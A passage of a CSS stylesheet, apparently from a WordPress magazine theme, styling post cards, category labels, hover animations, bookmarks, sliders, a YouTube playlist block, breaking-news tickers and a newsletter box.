10px; display: block; visibility: hidden; padding: 5px; -webkit-transition: var(--effect); transition: var(--effect); opacity: 0; color: #fff !important; background-color: #333; } .post-slider .post-edit-link { right: auto; left: 0; } .notification-content .post-edit-link { display: none; } .p-wrap:hover .post-edit-link, .holder-wrap:hover .post-edit-link { visibility: visible; opacity: 1; } .post-edit-link:hover { background-color: var(--g-color); } .entry-format-absolute { line-height: 0; position: absolute; z-index: 2; top: 0; right: 0; bottom: auto; display: flex; align-items: flex-end; justify-content: flex-end; pointer-events: none; } .p-format i { font-size: inherit; line-height: 1; display: block; } .p-format .rbi-video { -webkit-transform: scale(1.1); transform: scale(1.1); } .entry-format-absolute.format-style-bottom { z-index: 100; top: auto; right: 0; bottom: 0; left: auto; } .entry-format-absolute.format-style-top { z-index: 11; } .entry-format-absolute.format-style-bottom .p-format { position: relative; padding: 7px 5px 5px 7px; color: var(--body-fcolor); border-radius: 50% 0 0 0; background-color: var(--solid-white); } .grid-box .entry-format-absolute.format-style-bottom .p-format { background-color: var(--box-color, var(--solid-light)); } [data-theme='dark'] .grid-box .entry-format-absolute.format-style-bottom .p-format, .light-scheme .grid-box .entry-format-absolute.format-style-bottom .p-format { background-color: var(--dark-box-color, var(--solid-light)); } .format-style-bottom .p-format { font-size: 20px; } .gallery-count { line-height: 1; position: absolute; top: 0; right: 0; padding: 4px; } .format-style-bottom .gallery-count { font-size: 10px; line-height: 14px; top: 2px; right: 0; display: block; width: 14px; height: 14px; padding: 0; text-align: center; color: var(--absolute-white); border-radius: 100%; background-color: var(--g-color); } .entry-format-absolute.format-style-top { font-size: 26px; left: 0; } .entry-format-absolute.format-style-center { top: 50%; right: auto; left: 50%; align-items: center; justify-content: center; width: 60px; height: 60px; margin-top: -30px; margin-left: -30px; } .entry-format-absolute.format-style-center .p-format { font-size: 40px; display: inline-flex; background-color: transparent; text-shadow: 0 0 10px rgba(0, 0, 0, .25); } .entry-format-absolute.format-style-top .p-format { display: block; margin-left: auto; padding: .3em; } .entry-format-absolute.format-style-top .p-format:after { position: absolute; top: 0; right: 0; left: 0; height: 3px; content: ''; } .entry-format-absolute.format-style-center .gallery-count { font-size: var(--rem-small); position: relative; top: auto; right: auto; display: inline-flex; justify-content: flex-start; margin-top: -.75em; } .format-style-top .p-format:after { background-color: var(--video-color); } .p-format.format-gallery, .format-style-top .p-format.format-gallery:after { background-color: var(--gallery-color); } .p-format.format-audio, .format-style-top .p-format.format-audio:after { background-color: var(--audio-color); } .format-style-top .gallery-count { font-weight: 700; border-radius: var(--round-7); background-color: inherit; } .p-readmore { line-height: 1; display: inline-flex; align-items: center; flex-flow: row nowrap; padding: 7px 15px; -webkit-transition: var(--effect); transition: var(--effect); border: 1px solid var(--g-color); border-radius: var(--round-3); } .p-readmore i, .pagination-simple i { font-size: var(--em-small); margin-left: .4em; -webkit-transition: transform .25s var(--timing); transition: transform .25s var(--timing); } .pagination-simple .newer i { margin-right: .4em; margin-left: 0; } .p-readmore:hover { color: var(--absolute-white); background: var(--g-color); -webkit-box-shadow: 0 0 10px var(--g-color-90); box-shadow: 0 0 10px var(--g-color-90); } .p-readmore:hover i, .pagination-simple a:hover i { -webkit-transform: translateX(3px); transform: translateX(3px); } .pagination-simple .newer a:hover i { -webkit-transform: translateX(-3px); transform: translateX(-3px); } .review-meta { position: relative; display: block; } .p-center .review-meta.has-bookmark { display: flex; flex-flow: row nowrap; justify-content: center; width: 100%; } .review-meta.type-star { padding-top: 2px; } .review-meta-inner { display: flex; align-items: center; flex-flow: row nowrap; } .review-meta-inner .extra-meta { display: flex; align-items: center; } .review-meta-inner .extra-meta:before { display: inline-flex; width: 3px; height: 3px; margin-right: .6em; margin-left: .6em; content: ''; opacity: .5; border-radius: 100%; background-color: currentColor; } .rline-wrap { position: relative; display: inline-flex; flex-flow: row nowrap; margin-right: 9px; } .rline { display: inline-flex; width: 20px; height: 7px; margin-right: 1px; background-color: var(--flex-gray-15); } .rline:nth-child(1) { background-color: #ff0d0d; } .rline:nth-child(2) { background-color: #ff5612; } .rline:nth-child(3) { background-color: #ffa444; } .rline:nth-child(4) { background-color: #a0b339; } .rline:nth-child(5) { background-color: #50a735; } .rline:not(.activated) { background-color: var(--flex-gray-15); } .rstar-wrap { position: relative; display: inline-flex; overflow: hidden; margin-right: 8px; color: #fff; } .rstar { position: relative; display: inline-flex; align-items: center; justify-content: center; width: 20px; height: 20px; margin-right: 1px; } .rstar:before { position: absolute; z-index: 0; top: 0; right: 0; bottom: 0; left: 0; content: ''; background-color: var(--flex-gray-15); } .review-description { white-space: nowrap; } .review-description strong { font-weight: var(--meta-b-fweight); } .rstar:last-child { margin-right: 0; } .rstar i { font-size: 14px; line-height: 1; position: relative; z-index: 10; } .rstar-bg { position: absolute; z-index: 1; top: 0; right: 0; bottom: 0; left: 0; background-image: linear-gradient(to right, var(--review-color) 95%, transparent 5%); background-image: -webkit-linear-gradient(left, var(--review-color) 95%, transparent 5%); background-position: 0 0; background-size: 21px 20px; } .hover-ani-2 .p-url { -webkit-transition: all 0.25s var(--timing); transition: all 0.25s var(--timing); } .hover-ani-2 .p-url:hover { color: var(--g-color); } .hover-ani-2[data-theme='dark'] .p-url:hover, .hover-ani-2 .overlay-text .p-url:hover, .hover-ani-2 .light-scheme .p-url:hover { opacity: .7; color: var(--absolute-white); } .hover-ani-1 .p-url { -webkit-transition: all .25s var(--timing); transition: all .25s var(--timing); text-decoration-line: underline; text-decoration-color: transparent; -webkit-text-decoration-color: transparent; -moz-text-decoration-color: transparent; text-decoration-thickness: .1em; } .hover-ani-1 .p-url:hover { text-decoration-color: var(--g-color); -webkit-text-decoration-color: var(--g-color); } body:not([data-theme='dark']).hover-ani-1 .p-url:hover { color: var(--g-color); } body.hover-ani-1 .light-scheme .p-url:hover, body:not([data-theme='dark']).hover-ani-1 .overlay-text .p-url:hover { color: var(--absolute-white); } .hover-ani-3 .p-url { -webkit-transition: background-position 0.2s ease; transition: background-position 0.2s ease; background-image: -webkit-gradient(linear, left top, left bottom, from(currentColor), to(currentColor)); background-image: linear-gradient(currentColor, currentColor); background-repeat: no-repeat; background-position: left 102%; -webkit-background-size: 100% 0; background-size: 100% 0; will-change: background-position; } .hover-ani-3 .p-url:hover { background-position: left calc(100% - .1em); -webkit-background-size: 100% 2px; background-size: 100% 2px; } .hover-ani-4 .p-url { -webkit-transition: background-size 0.25s var(--timing); transition: background-size 0.25s var(--timing); background-image: -webkit-gradient(linear, left top, left bottom, from(var(--g-color-90)), to(var(--g-color-90))); background-image: linear-gradient(var(--g-color-90), var(--g-color-90)); background-repeat: no-repeat; background-position: 0% 100%; background-size: 100% 0%; } .hover-ani-4 .p-url:hover { background-size: 100% 30%; } .hover-ani-5 .p-url { -webkit-transition: background-size 0.4s ease, color 0.4s ease; transition: background-size 0.4s ease, color 0.4s ease; background-image: -webkit-gradient(linear, left top, left bottom, from(var(--g-color)), to(var(--g-color))); background-image: linear-gradient(var(--g-color), var(--g-color)); background-repeat: no-repeat; background-position: 0% 100%; background-size: 0% 100%; } .hover-ani-5 .p-url:hover { color: var(--absolute-white); background-size: 100% 100%; } .hover-ani-6 .p-url { -webkit-transition: background-size 0.25s var(--timing); transition: background-size 0.25s var(--timing); background-image: -webkit-gradient(linear, left top, left bottom, from(currentColor), to(currentColor)); background-image: linear-gradient(currentColor, currentColor); background-repeat: no-repeat; background-position: bottom left; -webkit-background-size: 0% 1px; background-size: 0% 1px; } .hover-ani-6 .p-url:hover { -webkit-background-size: 100% 1px; background-size: 100% 1px; } @keyframes hover-ani-7 { 0% { background-size: 0% 5px; -webkit-background-size: 0% 5px; } 50% { background-size: 100% 5px; -webkit-background-size: 100% 5px; background-position: bottom left; } 51% { background-size: 100% 5px; -webkit-background-size: 100% 5px; background-position: bottom right; } 100% { background-size: 0% 5px; -webkit-background-size: 0% 5px; background-position: bottom right; } } @-webkit-keyframes hover-ani-7 { 0% { background-size: 0% 5px; -webkit-background-size: 0% 5px; } 50% { background-size: 100% 5px; -webkit-background-size: 100% 5px; background-position: bottom left; } 51% { background-size: 100% 5px; -webkit-background-size: 100% 5px; background-position: bottom right; } 100% { background-size: 0% 5px; -webkit-background-size: 0% 5px; background-position: bottom right; } } .hover-ani-7 .p-url { background-image: -webkit-gradient(linear, left top, left bottom, from(var(--g-color)), to(var(--g-color))); background-image: linear-gradient(var(--g-color), var(--g-color)); background-repeat: no-repeat; background-position: bottom left; -webkit-background-size: 0% 5px; background-size: 0% 5px; } .hover-ani-7 .p-url:hover { -webkit-animation: hover-ani-7 1.5s ease; animation: hover-ani-7 1.5s ease; } .hover-ani-8 .p-url { -webkit-transition: opacity .25s var(--timing); transition: opacity .25s var(--timing); opacity: 1; } .hover-ani-8 .p-url:hover { opacity: .5; } .bookmark-info { position: fixed; z-index: 5000; right: 0; bottom: 60px; left: 0; display: none; width: 100%; text-align: center; } .bookmark-holder { display: inline-flex; overflow: hidden; align-items: stretch; flex-flow: row nowrap; width: 100%; max-width: 370px; -webkit-border-radius: var(--round-7); border-radius: var(--round-7); background-color: var(--solid-white); -webkit-box-shadow: 0 4px 30px var(--shadow-12); box-shadow: 0 4px 30px var(--shadow-12); } .bookmark-featured { position: relative; flex-shrink: 0; width: 90px; } .bookmark-featured img { position: absolute; top: 0; left: 0; width: 100%; height: 100%; } .bookmark-inner { display: flex; flex-flow: column nowrap; flex-grow: 1; padding: 15px; } .bookmark-title { display: inline-block; overflow: hidden; max-width: 235px; white-space: nowrap; text-overflow: ellipsis; color: #649f74; } .bookmark-desc { font-size: var(--rem-mini); line-height: 1.5; display: block; margin-top: 5px; text-align: left; color: var(--meta-fcolor); } .bookmark-info.removed .bookmark-title { color: #ff7142; } .bookmark-remove-holder { font-size: var(--rem-mini); align-items: center; padding: 15px 20px; } .bookmark-undo { margin-left: auto; -webkit-transition: var(--effect); transition: var(--effect); color: #649f74; } .bookmark-undo:hover { text-decoration: underline; } .bookmark-remove-holder p { font-size: var(--rem-mini); } [data-theme='dark'] .bookmark-title, [data-theme='dark'] .bookmark-undo { color: #7cffb9; } .p-category { font-family: inherit; font-weight: inherit; font-style: inherit; line-height: 1; position: relative; z-index: 1; display: inline-flex; flex-shrink: 0; } .p-category:not(:last-child) { margin-right: 3px; } .s-cats .p-category:not(:last-child) { margin-bottom: 3px; } .ecat-bg-1 .p-category, .ecat-bg-2 .p-category, .ecat-bg-3 .p-category { padding: 7px 12px; -webkit-transition: all .25s var(--timing); transition: all .25s var(--timing); text-decoration: none; color: var(--cat-fcolor, var(--absolute-white)); } .ecat-border .p-category { padding: 7px 12px; -webkit-transition: all .25s var(--timing); transition: all .25s var(--timing); text-decoration: none; color: var(--cat-highlight, var(--g-color)); border: 1px solid var(--cat-highlight, var(--g-color)); -webkit-border-radius: 999px; border-radius: 999px; } .ecat-bg-3 .p-category { padding-right: 15px; padding-left: 15px; -webkit-border-radius: 100px; border-radius: 100px; background-color: var(--cat-highlight, var(--g-color)); } .ecat-bg-4 .p-category { padding: 3px 7px; -webkit-transition: all .25s var(--timing); transition: all .25s var(--timing); text-decoration: none; color: var(--cat-fcolor, var(--absolute-white)); -webkit-border-radius: var(--round-3); border-radius: var(--round-3); background-color: var(--cat-highlight, var(--g-color)); } .ecat-bg-3 .post-edit-link { right: auto; left: 10px; } .ecat-bg-1 .p-category:before, .ecat-bg-2 .p-category:before { position: absolute; z-index: -1; top: 0; right: 0; bottom: 0; left: 0; display: block; content: ''; -webkit-transition: -webkit-box-shadow .25s var(--timing); transition: box-shadow .25s var(--timing); border-radius: var(--round-3); background-color: var(--cat-highlight, var(--g-color)); } .ecat-bg-1 .p-category:before { -webkit-transform: skewX(-25deg); transform: skewX(-25deg); } .ecat-bg-1 .p-category:hover:before, .ecat-bg-2 .p-category:hover:before, .ecat-bg-3 .p-category:hover, .ecat-bg-4 .p-category:hover { -webkit-box-shadow: 0 0 10px var(--cat-highlight-90, var(--g-color-90)); box-shadow: 0 0 10px var(--cat-highlight-90, var(--g-color-90)); } .ecat-text .p-category { line-height: 1.5; transition: var(--effect); vertical-align: middle; color: var(--cat-highlight, inherit); --webkit-transition: var(--effect); } .ecat-text .p-category:not(:first-child):before { display: inline-block; justify-content: center; margin-right: 3px; content: '/'; opacity: .4; color: var(--body-fcolor); } .ecat-bg-1 .feat-holder .p-top, .ecat-bg-2 .feat-holder .p-top { position: absolute; z-index: 20; bottom: -2px; left: 0; margin-bottom: 0; } .p-grid.ecat-bg-2:not(.p-center) .feat-holder .p-top { padding-left: 7px; } .ecat-l-dot .overlay-text .p-category, .ecat-b-border .overlay-text .p-category, .ecat-text .overlay-text .p-category, .ecat-border .overlay-text .p-category, .ecat-b-dotted .overlay-text .p-category, .overlay-text .ecat-l-dot .p-category, .overlay-text .ecat-b-border .p-category, .overlay-text .ecat-text .p-category, .overlay-text .ecat-border .p-category, .overlay-text .ecat-b-dotted .p-category { color: var(--absolute-white); } .ecat-l-dot .p-category:before { display: inline-flex; width: 1em; height: 1em; margin-right: 7px; content: ''; -webkit-border-radius: 100%; border-radius: 100%; background-color: var(--cat-highlight, var(--g-color)); } .ecat-l-dot .p-category { -webkit-transition: var(--effect); transition: var(--effect); text-decoration: underline dotted transparent; } .ecat-l-dot .p-category:hover { text-decoration-color: var(--cat-highlight, currentColor); } .ecat-l-dot .p-category:not(:last-child) { margin-right: 7px; } .ecat-b-dotted .p-category { -webkit-transition: var(--effect); transition: var(--effect); border-bottom: 3px dotted var(--cat-highlight, var(--g-color)); } .ecat-b-dotted .p-category:not(:last-child), .ecat-b-border .p-category:not(:last-child) { margin-right: 7px; } .ecat-b-border .p-category:before { position: absolute; z-index: -1; bottom: 0; left: 0; display: block; width: 100%; height: 5px; content: ''; -webkit-transition: var(--effect); transition: var(--effect); background-color: var(--cat-highlight, var(--g-color)); } .ecat-b-border .p-category:hover:before { height: 1px; } .ecat-text .entry-format-relative .p-format, .ecat-b-border .entry-format-relative .p-format, .ecat-b-dotted .entry-format-relative .p-format { color: var(--video-color); background-color: transparent; } .ecat-b-text .entry-format-relative .p-format.format-gallery, .ecat-b-border .entry-format-relative .p-format.format-gallery, .ecat-b-dotted .entry-format-relative .p-format.format-gallery { color: var(--gallery-color); } .ecat-b-text .entry-format-relative .p-format.format-gallery, .ecat-b-border .entry-format-relative .p-format.format-audio, .ecat-b-dotted .entry-format-relative .p-format.format-gallery { color: var(--audio-color); } .ecat-bg-3 .feat-holder .p-top { position: absolute; z-index: 10; top: 10px; right: 10px; left: auto; justify-content: flex-end; width: auto; margin-bottom: 0; } .ecat-bg-4 .feat-holder .p-top { position: absolute; z-index: 10; bottom: 0; left: 0; margin-bottom: 0; } .ecat-bg-1 .spacing, .ecat-bg-2 .spacing { display: block; height: 0; padding-bottom: 5px; } .ecat-text .p-category:hover, .ecat-border .p-category:hover { opacity: .7; } .ecat-b-dotted .p-category:hover { color: var(--cat-highlight, var(--g-color)); } .ecat-b-dotted .overlay-text .p-category:hover { color: var(--absolute-light); } .is-p-protected a:before { font-family: var(--cat-family); font-size: var(--cat-fsize); font-weight: var(--cat-fweight); font-style: var(--cat-fstyle); line-height: 1; display: none; margin-right: 5px; padding: 3px 8px; content: ''; vertical-align: .25em; text-decoration: none; color: var(--absolute-white); border-radius: var(--round-3); background-color: var(--g-color); } .exclusive-style-border .is-p-protected a:before { color: inherit; border: 1px solid var(--g-color); -webkit-border-radius: var(--round-3); border-radius: var(--round-3); background: none; } .p-format { line-height: 1; position: static; pointer-events: none; color: var(--absolute-white); border-bottom-left-radius: var(--round-3); background-color: var(--video-color); } .p-content { position: relative; } .p-grid-small-1 .counter-el:before { font-size: 2.5rem; margin-right: var(--el-spacing); opacity: 1; color: var(--g-color); } .p-list-small-2 { display: flex; flex-flow: row nowrap; } .p-list-small-2 .counter-el { position: absolute; top: 0; right: 0; } .p-list-small-2.right-featured .counter-el { right: auto; left: 0; } .p-grid-1 .counter-el, .p-grid-2 .counter-el { position: absolute; top: auto; right: 0; } .p-list-small-1 .counter-el { position: absolute; top: auto; right: 0; bottom: 0; } .p-overlay .counter-el, .p-highlight .counter-el { position: absolute; top: auto; right: 0; bottom: 0; margin: 0; } .p-grid-box-1 .counter-el, .p-grid-box-2 .counter-el { position: absolute; top: auto; right: var(--box-spacing); } .grid-box .feat-holder .p-top { padding-left: var(--box-spacing); } .p-list-small-1 .counter-el:before, .p-list-small-2 .counter-el:before, .p-grid-1 .counter-el:before, .p-grid-2 .counter-el:before, .p-grid-box-1 .counter-el:before, .p-grid-box-2 .counter-el:before, .p-overlay .counter-el:before, .p-highlight .counter-el:before { font-size: 3.5rem; line-height: 1; margin-right: 0; opacity: .15; } .p-highlight .counter-el:before, .p-overlay .counter-el:before { min-width: auto; } .p-grid-2 .p-content { padding-top: 5px; } .p-grid-box-1 .counter-el:before, .p-grid-box-2 .counter-el:before { justify-content: flex-end; } .p-list-small-2 .feat-holder { flex-shrink: 0; width: 100px; margin-right: var(--featured-spacing, 15px); } .p-list-small-2 .p-content { flex-grow: 1; } .p-list-small-2 .p-format i { -webkit-transform: scale(.83); transform: scale(.83); } .p-wrap.p-list-small-2 .feat-holder, .p-wrap.p-list-small-2 .p-meta { margin-bottom: 0; } .right-featured { flex-direction: row-reverse; } .p-list-small-2.right-featured .feat-holder { margin-right: 0; margin-left: var(--featured-spacing, 15px); } .p-list-small-3 .p-featured { border-radius: 100%; } .p-list-small-3 { align-items: center; } .p-list-small-3 .counter-el { top: 0; } .list-holder { display: flex; align-items: center; flex-flow: row wrap; margin-right: var(--list-holder-margin, -15px); margin-left: var(--list-holder-margin, -15px); } .list-holder > * { flex-grow: 1; width: 100%; max-width: 100%; padding-right: var(--list-holder-spacing, 15px); padding-left: var(--list-holder-spacing, 15px); } .p-wrap.p-vtop .list-holder { align-items: flex-start; } .p-wrap.p-middle .list-holder { align-items: center; } .p-wrap.p-vbottom .list-holder { align-items: flex-end; } .sponsor-inner, .sponsor-icon { display: flex; align-items: center; flex-flow: row nowrap; } .sponsor-label { white-space: nowrap; } .p-wrap .sponsor-label { color: var(--g-color); } .light-scheme .sponsor-label, [data-theme='dark'] .sponsor-label { color: var(--absolute-light); } .sponsor-inner > *:not(:last-child) { margin-right: 5px; } .sponsor-icon i { font-size: 1em; } .spon-qview .sponsor-icon i { font-size: 1.15em; } .sponsor-meta { position: relative; display: flex; align-items: center; flex-flow: row nowrap; width: 100%; } .p-center .sponsor-meta { justify-content: center; } .sponsor-meta .sponsor-link { display: flex; align-items: center; } .sponsor-meta img { width: auto; height: auto; max-height: 1.8em; } .p-small .sponsor-meta img { max-height: 1.4em; } .sponsor-brand-light { display: none; } body[data-theme='dark'] .sponsor-brand-light, body .overlay-text .sponsor-brand-light, body .block-wrap.light-scheme .sponsor-brand-light { display: block !important; } body[data-theme='dark'] .sponsor-brand-default, .overlay-text .sponsor-brand-default { display: none; } .s-title-sticky { display: none; align-items: center; flex-flow: row nowrap; flex-grow: 1; margin-left: 10px; color: var(--nav-color); } .s-title-sticky-left { display: flex; align-items: center; flex-flow: row nowrap; flex-grow: 1; } .sticky-share-list { display: flex; align-items: center; flex-flow: row nowrap; flex-shrink: 0; height: 100%; margin-right: 5px; } .sticky-share-list .t-shared-header { opacity: .5; } .sticky-title-label { font-size: var(--em-small); margin-right: 7px; text-transform: uppercase; opacity: .5; } .sticky-title { display: block; overflow: hidden; width: 100%; max-width: 600px; white-space: nowrap; text-overflow: ellipsis; } .t-shared-header { align-items: center; flex-flow: row nowrap; margin-right: 6px; white-space: nowrap; } .t-shared-header i { font-size: var(--em-small); margin-right: 5px; } .sticky-share-list-items { align-items: center; height: 100%; } .sticky-share-list-buffer { display: none; } /* ----------------- 7 - Post Modules ----------------- */ .p-list-inline { display: flex; width: 100%; --bottom-spacing: 7px; } .p-list-inline i { font-size: 8px; line-height: 8px; display: inline; width: 8px; height: 8px; margin-right: .3em; -webkit-transition: var(--effect); transition: var(--effect); vertical-align: middle; } .p-list-inline .entry-title:hover i { color: var(--g-color); -webkit-border-radius: 100%; border-radius: 100%; background-color: var(--g-color); } [data-theme='dark'] .p-list-inline .entry-title:hover i { color: var(--absolute-white); background-color: var(--absolute-white); } .overlay-text .p-list-inline .entry-title:hover i { color: var(--absolute-white); background-color: var(--absolute-white); } .p-highlight, .overlay-holder { position: relative; overflow: hidden; border-radius: var(--wrap-border, var(--round-3)); } .p-center .p-content { text-align: center; } .p-center:not(.p-list-1) .p-top, .p-center .review-meta-inner { justify-content: center; padding-right: 0; padding-left: 0; --box-spacing: 0; } .p-center .p-meta { display: flex; flex-flow: row nowrap; justify-content: center; } .p-center .meta-inner { flex-grow: 0; } .p-center .rb-bookmark { position: relative; margin-left: 7px; } .p-center .counter-holder .counter-el { position: absolute; bottom: 0; left: 50%; -webkit-transform: translateX(-50%); transform: translateX(-50%); opacity: .2; } .p-center .counter-holder { position: relative; } .p-middle.p-small { align-items: center; } .p-middle.p-highlight .overlay-wrap, .p-middle.p-overlay .overlay-wrap { align-items: center; } .p-middle.p-highlight .overlay-wrap:before, .p-middle.p-overlay .overlay-wrap:before { position: absolute; top: 0; right: 0; bottom: 0; left: 0; display: block; width: 100%; content: ''; opacity: .7; background: var(--dark-accent); } .p-vtop.p-highlight .overlay-wrap, .p-vtop.p-overlay .overlay-wrap { align-items: flex-start; } .p-classic .p-content { max-width: var(--content-width, 100%); margin-right: auto; margin-left: auto; } /* ----------------- 8 - Blocks ----------------- */ .block-wrap { position: relative; display: block; counter-reset: trend-counter; } .block-wrap .rb-error { padding: 20px; text-align: center; color: var(--meta-fcolor); } .bottom-border .block-inner > * { padding-bottom: var(--bottom-spacing); } .bottom-border .block-inner > *:before { position: absolute; top: auto; right: var(--column-gap, 0); bottom: 0; left: var(--column-gap, 0); height: 1px; content: ''; pointer-events: none; border-bottom: 1px var(--bottom-border-style, solid) var(--bottom-border-color); } .bottom-border.no-last-bb .block-inner > *:last-child:before { border-bottom: none; } .bottom-border.no-last-bb .block-inner > *:last-child { padding-bottom: 0; } .is-border-dark { --column-border-color: currentColor; } .is-b-border-dark { --bottom-border-color: currentColor; } .is-border-gray-dot { --column-border-style: dotted; } .is-b-border-gray-dot { --bottom-border-style: dotted; } .is-border-dark-dot { --column-border-style: dotted; --column-border-color: currentColor; } .is-b-border-dark-dot { --bottom-border-style: dotted; --bottom-border-color: currentColor; } .is-border-gray-dash { --column-border-style: dashed; } .is-b-border-gray-dash { --bottom-border-style: dashed; } .is-border-dark-dash { --column-border-style: dashed; --column-border-color: currentColor; } .is-b-border-dark-dash { --bottom-border-style: dashed; --bottom-border-color: currentColor; } .elementor-column.rb-sticky { position: relative; align-items: flex-start; } .rb-sticky > * { position: -webkit-sticky; position: sticky; top: 12px; -webkit-transition: top .3s ease; transition: top .3s ease; will-change: top; } .rb-error a { text-decoration: underline; } .rb-error a:hover { color: var(--g-color); } .scroll-holder { scrollbar-color: var(--shadow-7) var(--flex-gray-15); scrollbar-width: thin; } .short-pagination .pagination-nextprev { justify-content: flex-start; } .short-pagination .pagination-nextprev a > span { display: none; } .short-pagination .pagination-nextprev > *:first-child { margin-right: 5px } .pagination-nextprev > * { justify-content: center; min-width: 135px; } .short-pagination .pagination-nextprev > * { min-width: 0; } .short-pagination .pagination-trigger { padding: 0 10px; } .scroll-holder::-webkit-scrollbar { width: 5px; -webkit-border-radius: var(--round-7); border-radius: var(--round-7); background: var(--flex-gray-7); } .scroll-holder::-webkit-scrollbar-thumb { -webkit-border-radius: var(--round-7); border-radius: var(--round-7); background-color: var(--flex-gray-15); } .scroll-holder::-webkit-scrollbar-corner { -webkit-border-radius: var(--round-7); border-radius: var(--round-7); background-color: var(--flex-gray-15); } .swiper-wrapper .p-wrap { margin-bottom: 0; } .slider-footer { display: flex; align-items: center; justify-content: center; margin-top: 10px; } .slider-footer > * { display: inline-flex; align-items: center; min-height: 10px; padding: 0 4px; color: var(--slider-nav-color, inherit); } .slider-footer .rbi { font-size: 18px; -webkit-transition: var(--effect); transition: var(--effect); } .post-slider .slider-prev, .post-slider .slider-next { font-size: 1.75rem; position: absolute; z-index: 10; top: 50%; right: auto; left: 0; display: flex; align-items: center; justify-content: center; width: 60px; height: 60px; margin-top: -30px; -webkit-transition: var(--effect); transition: var(--effect); color: var(--absolute-white); } .post-slider .slider-next { right: 0; left: auto; } .post-slider .slider-prev:hover, .post-slider .slider-next:hover { color: var(--g-color); } .slider-footer .rbi:hover { color: var(--g-color); } .block-hrc .p-wrap:first-child { margin-bottom: calc(var(--bottom-spacing) * .5); padding-bottom: calc(var(--bottom-spacing) * .5); border-bottom: 1px solid var(--flex-gray-15); --bottom-spacing: 20px; } .hrc-3 .sub-section { margin-top: calc(var(--bottom-spacing) * .5); padding-top: calc(var(--bottom-spacing) * .5); border-top: 1px solid var(--flex-gray-20); --bottom-spacing: 20px; } .hrc-holder { display: flex; align-items: flex-start; flex-flow: row nowrap; } .hrc-col .p-wrap { display: block; width: 100%; } .yt-playlist { overflow: hidden; align-items: stretch; border-radius: var(--round-7); } .iframe-holder { position: relative; display: block; overflow: hidden; width: 100%; height: 0; padding-bottom: 56.25%; background-color: var(--shadow-7); } .yt-playlist .iframe-holder { background-color: var(--dark-accent); } .iframe-holder iframe { position: absolute; top: 0; right: 0; bottom: 0; left: 0; display: block; width: 100%; height: 100%; } .plist-items-inner { position: relative; height: 100%; background-color: var(--dark-accent); } .plist-holder { position: absolute; top: 0; left: 0; overflow-x: hidden; overflow-y: auto; width: 100%; height: 100%; padding-top: 80px; } .plist-item { display: flex; flex-flow: row nowrap; width: 100%; padding: 10px 20px; } .plist-item:hover { background-color: var(--shadow-7); } .plist-item-thumb { flex-shrink: 0; width: 90px; margin-right: 12px; } span.plist-item-title { line-height: 1.5; display: block; } .play-panel { position: absolute; z-index: 99; top: 0; right: 0; left: 0; display: flex; align-items: stretch; flex-flow: row nowrap; background-color: var(--dark-accent); box-shadow: 0 4px 10px var(--shadow-7); } .yt-trigger { position: relative; display: flex; flex-grow: 0; flex-shrink: 0; width: 70px; margin-right: 0; margin-left: auto; cursor: pointer; -webkit-transition: var(--effect); transition: var(--effect); background-color: var(--g-color); } .yt-trigger:hover { -webkit-box-shadow: 0 0 20px var(--g-color-90); box-shadow: 0 0 20px var(--g-color-90); } .yt-trigger-icons { position: relative; display: flex; align-items: center; justify-content: center; width: 100%; height: 100%; cursor: pointer; } .yt-trigger-icons svg { position: absolute; width: 30px; } .play-content { position: relative; overflow: hidden; flex-grow: 1; padding: 10px 12px; } .play-index { display: flex; margin-bottom: 7px; opacity: .5; } .index-info { margin-left: auto; } .play-title { display: block; overflow: hidden; width: 100%; white-space: nowrap; text-overflow: ellipsis; } .yt-trigger-icons .svg-pause, .is-playing .yt-trigger-icons .svg-play { display: none; } .is-playing .yt-trigger-icons .svg-pause { display: block; } .plist-meta { display: block; margin-top: 5px; opacity: .5; } .block-qlinks .block-inner { display: flex; align-items: center; flex-flow: row nowrap; } .qlinks-header { line-height: 0; flex-grow: 0; flex-shrink: 0; } .qlinks-layout-2 .qlinks-header { margin-right: 5px; } .qlinks-content { display: flex; flex-grow: 1; list-style: none; } .qlinks-content ul { display: flex; flex-flow: row nowrap; width: 100%; list-style: none; } .qlink a, .qlinks-heading { font-size: var(--rem-mini); } .qlinks-layout-1 .qlinks-heading { line-height: 1.15; color: var(--g-color); } .qlink a { position: relative; display: block; margin-right: 1px; padding: 4px 7px; -webkit-transition: var(--effect); transition: var(--effect); white-space: nowrap; } .qlinks-layout-1 .qlink a { line-height: 1.15; padding-top: 0; padding-bottom: 0; text-decoration-line: underline; text-decoration-color: transparent; } .qlinks-layout-1 .qlink a:hover { text-decoration: underline; text-decoration-color: var(--g-color); } .qlinks-layout-1 .qlink a:after { position: absolute; top: 4px; right: -1px; bottom: 4px; display: block; content: ''; border-left: 1px solid var(--flex-gray-20); } .qlinks-layout-2 .qlink a { line-height: 1; margin: 2px 5px; border-radius: var(--round-3); background-color: var(--flex-gray-7); } .archive-header .qlinks-layout-2 .qlink a { background-color: var(--flex-gray-15); } .qlinks-layout-2 .qlink a:hover { color: var(--absolute-white); background-color: var(--g-color); -webkit-box-shadow: 0 0 10px var(--g-color-90); box-shadow: 0 0 10px var(--g-color-90); } .qlink:last-child > a, .qlinks-layout-2 .qlink:last-child > a { margin-right: 0; } .qlinks-layout-1 .qlink:last-child > a:after { display: none; } .breaking-news-heading { font-size: var(--em-mini); display: flex; align-items: center; margin-right: 10px; padding: 0 10px; white-space: nowrap; border-radius: var(--round-5); background-color: var(--solid-white); box-shadow: 0 2px 10px var(--shadow-7); } .breaking-news-heading svg { width: 1em; margin-right: 4px; color: var(--g-color); } .breaking-news-prev { display: none; } .block-breaking-news { display: flex; flex-flow: row nowrap; } .breaking-news-slider .swiper-slide { padding-right: 50px; } .breaking-news-title.entry-title { display: flex; align-items: center; height: 100%; margin-bottom: 0; -webkit-transition: opacity .5s var(--timing); transition: opacity .5s var(--timing); -webkit-transition-delay: .2ms; transition-delay: .2s; opacity: 0; } .breaking-news-title.entry-title a { line-height: 1.7; display: inline-block; overflow: hidden; max-width: 100%; margin-bottom: 0; white-space: nowrap; text-overflow: ellipsis; } .swiper-slide-active .breaking-news-title.entry-title { opacity: 1 } .breaking-news-nav { font-size: 11px; position: absolute; z-index: 10; top: 0; right: 0; bottom: 0; display: flex; align-items: center; justify-content: space-around; width: 42px; height: 100%; } .breaking-news-nav > * { line-height: 1; cursor: pointer; -webkit-transition: var(--effect); transition: var(--effect); opacity: .3; } .breaking-news-nav > *:hover { opacity: 1; color: var(--g-color); } .newsletter-box { overflow: hidden; border-radius: var(--round-7); background-repeat: no-repeat; background-position: center; background-size: cover; } .newsletter-inner { display: flex; align-items: center; flex-flow: row wrap; padding: 20px; } 